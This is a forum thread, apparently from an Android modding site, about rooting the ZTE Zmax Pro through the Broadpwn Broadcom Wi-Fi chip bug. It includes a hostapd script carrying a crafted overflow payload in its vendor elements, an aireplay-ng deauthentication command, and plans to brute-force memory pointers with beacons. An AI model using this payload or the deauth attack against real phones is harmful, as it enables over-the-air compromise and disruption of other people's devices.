
Root ZTE Zmax Pro Official Root Discussion

Status
Not open for further replies.
haha I love the packet clone sploit on the 3DS.

I mean a lot of trial and error, but searching for pointers shouldn't be impossible. There's no ASLR.

If we have the instant reset failsafe in the chip, it's a completely dead end. If we don't, we can bruteforce the pointers directly with a modified aircrack script to automate beacon creation, then sending deauth packets to the phone after the exploit is triggered.

I'm not well versed in bash/python scripting, so this job would probably be better suited to someone else, but I have the hardware and software to test it (daily driver is Kali, with 3 different promiscuous-enabled NICs I can use).
 
I'm still feeling sorry for such a good device with a locked bootloader.. even the new LG Stylo 3 Plus got root today -_-


  

Didn't the Stylo 3 Plus just come out recently? So root is allowed on that phone but not this one, fml. ☹🙁😞😖😟
 

It will take years probably
What divine wisdom is this.

If we have the instant reset failsafe in the chip, it's a completely dead end. If we don't, we can bruteforce the pointers directly with a modified aircrack script to automate beacon creation, then sending deauth packets to the phone after the exploit is triggered.

I'm not well versed in bash/python scripting, so this job would probably be better suited to someone else, but I have the hardware and software to test it (daily driver is Kali, with 3 different promiscuous-enabled NICs I can use)
I write python scripts for fun. I might be up to the challenge, gimme a lil bit to sort out stuff. (I'm on windows using bash on windows, I know, disgusting)
 
What divine wisdom is this.


I write python scripts for fun. I might be up to the challenge, gimme a lil bit to sort out stuff. (I'm on windows using bash on windows, I know, disgusting)

It shouldn't be too complex. Plug and play would be easier with just "aireplay-ng 0 -1 -a <BSSID> -c <Phone BSSID>" instead of manually searching for the BSSID with the script. Beacon automation will be the hard part though. Might need to use a climbing int raise variable and force feed it into the next script with a n+1 scale or so.
 
It shouldn't be too complex. Plug and play would be easier with just "aireplay-ng 0 -1 -a <BSSID> -c <Phone BSSID>" instead of manually searching for the BSSID with the script. Beacon automation will be the hard part though. Might need to use a climbing int raise variable and force feed it into the next script with a n+1 scale or so.
With python a file could be created with an int stored in it, to force feed it into the next section of the beacon, read the int, int++ it, move on, right?
 
With python a file could be created with an int stored in it, to force feed it into the next section of the beacon, read the int, int++ it, move on, right?

Should be able to. You would need to add a wait condition for the deauth to actually go through though.
 
"run the CMD with administrator privileges and use the following commands -

adb devices

[hit enter]

adb reboot disemmcwp

[Your device will now reboot with some extra write permissions]"


Just came across this while looking for information on another phone, would the reboot disemmcwp work in our situation?
 
Do you need root to undervolt the CPU on Android?
Yes, undervolting needs root, as it is a root task during boot.
"run the CMD with administrator privileges and use the following commands -

adb devices

[hit enter]

adb reboot disemmcwp

[Your device will now reboot with some extra write permissions]"


Just came across this while looking for information on another phone, would the reboot disemmcwp work in our situation?

That command has been locked to root via FTM mode, so unless you have root suid it won't work.
 
Why use Python if Perl is available?

Python is more for system-type stuff, but for network-type attacks Perl is best.

Are you guys planning to run it on Android or off a host machine?
Honestly the reason I wasn't planning on using perl was because I don't know the language, but, if someone wants to beat me to the punch (It'll be a while, gotta finish transitioning to my new home) go for it. I'll devote my hobby time to writing that script if so.
 
Can python even catch that? Eh, worth trying anyway.

You could do it the lazy way with just a time out of like 10 seconds, but it'd slow down the entire bruteforce. Ruby would work well for this as well, but the only thing I know about using Ruby is how to install things with it really.
I mainly use VB with C++/C#, but they really aren't suited for a Linux environment.
The main languages we could use would be:

Basic bash scripting
Ruby
Python
Perl
C++ if we can interface Aircrack-ng with it
ASM (I'm not doing it in ASM. Even debugging is a pain in the ass)

So if anyone knows any of these languages, and has a Linux environment set up for ath9k or any other promiscuous NIC drivers, with the aircrack suite installed, we can get moving on the Broadcom exploit.
 
#!/bin/bash

#This script requires Hostapd
# WiFi Hotspot
interface=wlan0mon
driver=ath9k
#Access Point
ssid=BroadPwn
hw_mode=g
# WiFi Channel:
channel=1
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0

assocresp_elements=ddff0050f2020101000003a4000027a4000042435e0062322f00414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
vendor_elements=ddff0050f2020101000003a4000027a4000042435e0062322f00414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141


# -------- Deauth in case it is needed --------
# Input your APs BSSID after -a, and the phone BSSID after -c
#aireplay-ng -0 1 -a FF:FF:FF:FF:FF:FF -c AA:AA:AA:AA:AA:AA wlan0mon
#sleep 3
# -------- Deauth in case it is needed --------

Here's a script I found (And modified for my own use) that can trigger the exploit using hostapd. Give it a go if you're feeling lucky.
 
I know a little bash and some perl.. like old html cgi script stuff... lol.
I've used aircrack a loonngg time ago to test out my neighbor's wifi security ;)
I have Ubuntu on my laptop (fail... lol).

If I had some time to find all these things I could download them with my hotspot and give it a shot. What exactly do I need?

For just testing the exploit as is, just hostapd.

For finding address pointers, a beacon creation system, and a lot of time
 
You could do it the lazy way with just a time out of like 10 seconds, but it'd slow down the entire bruteforce. Ruby would work well for this as well, but the only thing I know about using Ruby is how to install things with it really.
I mainly use VB with C++/C#, but they really aren't suited for a Linux environment.
The main languages we could use would be:

Basic bash scripting
Ruby
Python
Perl
C++ if we can interface Aircrack-ng with it
ASM (I'm not doing it in ASM. Even debugging is a pain in the ass)

So if anyone knows any of these languages, and has a Linux environment set up for ath9k or any other promiscuous NIC drivers, with the aircrack suite installed, we can get moving on the Broadcom exploit.
Hey, thanks for the heads up, I'mma give it some juice.
 